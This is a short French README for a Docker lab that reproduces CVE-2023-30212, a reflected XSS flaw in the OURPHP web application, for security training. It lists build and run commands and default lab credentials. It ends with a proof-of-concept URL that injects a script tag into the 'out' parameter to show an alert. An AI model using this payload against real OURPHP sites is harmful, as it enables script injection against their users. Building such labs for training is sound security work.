
# Environnement vulnérable basé sur Docker pour s'entraîner à l'exploitation de CVE-2023-30212, avec une application web OURPHP présentant une vulnérabilité XSS réfléchie pour la formation en sécurité.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
maintenant pour configurer l'image docker
utilisez la commande sudo docker build -t work .
utilisez la commande sudo docker run -d -p 80:80 work
maintenant nous obtiendrons l'identifiant du conteneur
allez dans le navigateur et recherchez localhost ; 127.0.0.1
maintenant utilisez les identifiants
nom d'utilisateur : root
mot de passe : docker
base de données : work
nom d'utilisateur : work mot de passe : work
allez à l'URL http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
nous obtiendrons un message d'alerte "xss".